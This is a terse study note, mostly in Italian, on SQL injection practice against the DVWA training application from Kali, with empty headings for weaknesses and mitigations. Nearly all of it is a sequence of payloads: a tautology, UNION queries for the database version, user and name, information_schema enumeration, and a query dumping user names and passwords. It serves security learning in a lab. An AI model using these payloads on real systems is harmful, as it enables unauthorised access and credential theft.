ifconfig → ip

kali: <browser> ip/login.php → admin password → dvwa security → low




SQL Injection

Obiettivo: eseguire comandi SQL arbitrari per estrarre dati dal database

1’ OR ‘1’=’1

1’ UNION select 1, version()#

user()

database()

table_name FROM information_schema.tables WHERE table_schema='dvwa'#

column_name FROM information_schema.columns WHERE table_name='users'#

concat(user_id, ':', first_name, ':', last_name, ':', user, ':', password) FROM users#

Debolezze

Mitigazioni